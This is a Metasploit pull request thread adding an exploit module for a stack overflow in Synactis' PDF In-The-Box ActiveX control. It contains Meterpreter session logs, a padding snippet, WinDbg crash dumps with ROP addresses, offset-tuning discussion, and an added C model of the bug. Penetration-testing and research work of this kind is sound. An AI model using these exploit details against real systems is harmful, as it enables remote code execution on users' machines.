Add OSVDB-93754: Synactis PDF In-The-Box ConnectToSynactic Stack Buffer ... #1916

Merged
merged 5 commits into from Jun 7, 2013

Conversation

@wchen-r7 wchen-r7 commented Jun 7, 2013

This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX component, specifically PDF_IN_1.ocx. When a long string of data is given to the ConnectToSynactis function, which is meant to be used for the ldCmdLine argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry class pointer saved on the stack, and results in arbitrary code execution under the context of the user.

I downloaded the component from Logic Print 2013, which can be found here:
http://www.logic-print.com/en/printestimatingsoftware.html

Or, ask me for the trial for testing.

Demo:

msf exploit(synactis_connecttosynactis_bof) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.76:4444 
[*] Using URL: http://0.0.0.0:8080/thtF4sPSqZj
[*]  Local IP: http://10.0.1.76:8080/thtF4sPSqZj
[*] Server started.
msf exploit(synactis_connecttosynactis_bof) > 
[*] 10.0.1.79        synactis_connecttosynactis_bof - Requesting: /thtF4sPSqZj
[*] 10.0.1.79        synactis_connecttosynactis_bof - Target selected as: IE 8 on Windows XP SP3
[*] 10.0.1.79        synactis_connecttosynactis_bof - Using msvcrt ROP
[*] Sending stage (751104 bytes) to 10.0.1.79
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.79:1154) at 2013-06-06 20:02:00 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.79:1154) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3784)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1068
[+] Successfully migrated to process
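As an added illustration of the bug class described in the PR text (example code written for this page, not code from the module, from PDF_IN_1.ocx or from Synactis), the following C models a fixed-size stack buffer meant for the WinExec command line with a saved object pointer stored directly above it, copies an unbounded string into it the way strcpy does, and shows the bounded alternative. The 64-byte buffer, the field order, the stand-in registry struct and the 'A'/'B' payload are assumptions for the example; the real distance to the pointer in the module is what the 189-character filler in the snippet reviewed later in this thread is tuned for.

```c
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed frame layout: a fixed lpCmdLine buffer with a saved object
 * pointer (the TRegistry* in the real component) sitting right above it.
 * Sizes and ordering are illustrative, not taken from PDF_IN_1.ocx. */
#define CMDLINE_MAX 64
#define PAYLOAD_LEN (CMDLINE_MAX + sizeof(void *) + 1)

struct registry {            /* stands in for the TRegistry object */
    const char *key_path;
};

struct frame {
    char cmdline[CMDLINE_MAX];   /* buffer the strcpy fills */
    struct registry *reg;        /* saved pointer directly above it */
    char slack[16];              /* keeps the terminating NUL inside the object */
};

/* Same semantics as strcpy(f->cmdline, src): copy until NUL, no bound.
 * Written out over the whole frame so the overrun stays inside one C
 * object and the result is deterministic for the checks below. */
static void unbounded_copy(struct frame *f, const char *src)
{
    unsigned char *dst = (unsigned char *)f;
    size_t i = 0;
    do {
        dst[i] = (unsigned char)src[i];
    } while (src[i++] != '\0');
}

/* Vulnerable ConnectToSynactis-style routine: returns the saved pointer as
 * it looks after the copy. With an over-long string that value is attacker
 * data; the real code goes on to use the pointer, which is where control of
 * EIP comes from (the 41414141 and 0c0c0c0c seen in the crash dumps). */
uintptr_t connect_vulnerable(const char *cmdline, struct registry *reg)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    f.reg = reg;
    unbounded_copy(&f, cmdline);
    return (uintptr_t)f.reg;
}

/* Hardened form: measure first, refuse anything that does not fit with its
 * terminator, then copy exactly that many bytes. */
int connect_hardened(const char *cmdline, struct registry *reg, uintptr_t *saved)
{
    struct frame f;
    size_t n = strlen(cmdline);
    if (n >= CMDLINE_MAX)
        return -1;               /* would overflow: reject rather than truncate silently */
    memset(&f, 0, sizeof f);
    f.reg = reg;
    memcpy(f.cmdline, cmdline, n + 1);
    *saved = (uintptr_t)f.reg;
    return 0;
}

/* Constructed payload: CMDLINE_MAX filler bytes, then one pointer's worth of
 * 'B' (0x42) that lands exactly on the saved pointer, then the NUL. */
static void build_payload(char out[PAYLOAD_LEN])
{
    memset(out, 'A', CMDLINE_MAX);
    memset(out + CMDLINE_MAX, 'B', sizeof(void *));
    out[CMDLINE_MAX + sizeof(void *)] = '\0';
}

uintptr_t demo_overflow(void)
{
    struct registry reg = { "Software\\Synactis" };   /* constructed */
    char payload[PAYLOAD_LEN];
    build_payload(payload);
    return connect_vulnerable(payload, &reg);
}

/* The value the pointer must read after the overflow: every byte 0x42. */
uintptr_t overwritten_value(void)
{
    uintptr_t v;
    memset(&v, 'B', sizeof v);
    return v;
}

int demo_short_input_intact(void)
{
    struct registry reg = { "Software\\Synactis" };
    return connect_vulnerable("C:\\print\\job.pdf", &reg) == (uintptr_t)&reg;
}

int demo_hardened_rejects(void)
{
    struct registry reg = { "Software\\Synactis" };
    char payload[PAYLOAD_LEN];
    uintptr_t saved = 0;
    build_payload(payload);
    return connect_hardened(payload, &reg, &saved);
}

int main(void)
{
    printf("saved pointer after overflow: 0x%" PRIxPTR "\n", demo_overflow());
    printf("short input leaves pointer intact: %d\n", demo_short_input_intact());
    printf("hardened copy rejects payload (-1): %d\n", demo_hardened_rejects());
    return 0;
}
```

The point the model makes is the one the crash dumps later in the thread show: the overwritten value is not a return address but an object pointer, so the filler that reaches it only needs to be the right length, and the bytes that follow decide what gets dereferenced. Filler length is also why the exploit is sensitive to environment (the thread finds it depends on the default browser): any change in what sits between the buffer and the pointer moves the target.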

…er Overflow

This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX
component, specifically PDF_IN_1.ocx.  When a long string of data is given
to the ConnectToSynactis function, which is meant to be used for the ldCmdLine
argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry
class pointer saved on the stack, and results in arbitrary code execution under the
context of the user.
@corelanc0d3r (Contributor) commented:

FYI - 0c0d2028 may be a slightly more reliable target for the DEPS in the tests that we did across various IE versions

wchen-r7 commented Jun 7, 2013

Thanks for the reminder, yeah, the Metasploit one is 0c0d2020 by default.... I forgot about that. I think I'll update that documentation.

var p2 = '';
eax = "#{eax}";

while (p1.length < 189) p1 += "\\x41";
Contributor (reviewer) commented on this snippet:

Can be randomized?

wchen-r7 (Contributor Author) replied:

I've decided not to because it looks like you're landing here. I'll put this as 0x0c to make sure you get code execution. Same for the 0x42 padding.

@jvazquez-r7 (Contributor) commented:

It's not working for me on Windows XP SP3 / IE7:

(b20.fc4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\LOGICP~1\PDF_IN~1.OCX
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\LOGICP~1\PDF_IN~1.OCX - 
eax=41414141 ebx=056983ec ecx=01eecf08 edx=01eecd01 esi=008d9588 edi=00000000
eip=056883c0 esp=01eecdc4 ebp=01eecf08 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
PDF_IN_1!DllUnregisterServer+0x577f4:
056883c0 8b08            mov     ecx,dword ptr [eax]  ds:0023:41414141=????????
0:005> !exchain
01eecdc4: PDF_IN_1!DllUnregisterServer+57824 (056883f0)
01eecf10: 41414141
Invalid exception stack at 41414141
0:005> g
(b20.fc4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=01eec9f4 ebp=01eeca14 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
41414141 ??              ???

0:005> lmv m PDF_IN_1
start    end        module name
05620000 056b4000   PDF_IN_1 C (export symbols)       C:\LOGICP~1\PDF_IN~1.OCX
    Loaded symbol image file: C:\LOGICP~1\PDF_IN~1.OCX
    Image path: C:\LOGICP~1\PDF_IN~1.OCX
    Image name: PDF_IN~1.OCX
    Timestamp:        Sat Jun 20 00:22:17 1992 (2A425E19)
    CheckSum:         00000000
    ImageSize:        00094000
    File version:     1.2.0.0
    Product version:  1.2.0.0
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     040c.04e4
    CompanyName:      Synactis
    ProductName:      
    InternalName:     
    OriginalFilename: 
    ProductVersion:   1.0.0.0
    FileVersion:      1.2.0.0
    FileDescription:  PDF In-The-Box
    LegalCopyright:   Synactis
    LegalTrademarks:  Synactis
    Comments:         

@jvazquez-r7 (Contributor) commented:

Working on IE7 right now:

[*] 10.6.0.165       synactis_connecttosynactis_bof - Requesting: /hAfgzm
[*] 10.6.0.165       synactis_connecttosynactis_bof - Target selected as: IE 7 on Windows XP SP3
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:51498) at 2013-06-07 11:13:42 -0500
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:51498) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1428)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3828
[+] Successfully migrated to process 

But not on IE8 / Windows XP SP3 in my testing:

0:017> g
(dd0.d5c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\LOGICP~1\PDF_IN~1.OCX
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\LOGICP~1\PDF_IN~1.OCX - 
eax=0c0c0c0c ebx=039683ec ecx=20202020 edx=0201c601 esi=0201cab8 edi=00000000
eip=20202020 esp=0201c6bc ebp=0201c804 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
20202020 d318            rcr     dword ptr [eax],cl   ds:0023:0c0c0c0c=20202020
0:008> dd 0c0c0c0c
0c0c0c0c  20202020 20202020 20202020 20202020
0c0c0c1c  20202020 20202020 20202020 20202020
0c0c0c2c  20202020 20202020 20202020 20202020
0c0c0c3c  20202020 20202020 20202020 20202020
0c0c0c4c  20202020 20202020 20202020 20202020
0c0c0c5c  20202020 20202020 20202020 20202020
0c0c0c6c  20202020 20202020 20202020 20202020
0c0c0c7c  20202020 20202020 20202020 20202020
0:008> dd 20202020
20202020  77c218d3 41414141 20302024 77c1e844
20202030  41414141 77c1e844 77c4fa1c ffffffff
20202040  77c127e5 77c127e5 77c4e0da 2cfe1467
20202050  77c4eb80 77c58fbc 77c34fcd 2cfe04a7
20202060  77c4eb80 77c14001 77c3048a 77c47a42
20202070  77c46efb 77c2aacc 77c3b860 77c1110c
20202080  77c12df9 77c35459 f254c481 2bb8ffff
20202090  da814792 2474d9d1 c92b5ff4 47314bb1

wchen-r7 commented Jun 7, 2013

Looks like the offset isn't consistent. It's landing at 0c0c0c0c instead of 0x20302028.

@jvazquez-r7 (Contributor) commented:

After digging with @wchen-r7, the overflow offset is dependent on the default browser configured on the machine. With IE8 as the default browser, it works fine:


[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:51989) at 2013-06-07 11:51:39 -0500
[*] Session ID 2 (10.6.0.165:4444 -> 10.6.0.165:51989) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2676)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3036
[+] Successfully migrated to process 

Just to play with the firing order for Browser Autopwn, this one
should fire as late as possible.
@jvazquez-r7 (Contributor) commented:

Awesome, merging!

jvazquez-r7 pushed a commit that referenced this pull request Jun 7, 2013
@jvazquez-r7 jvazquez-r7 merged commit ea2895a into rapid7:master Jun 7, 2013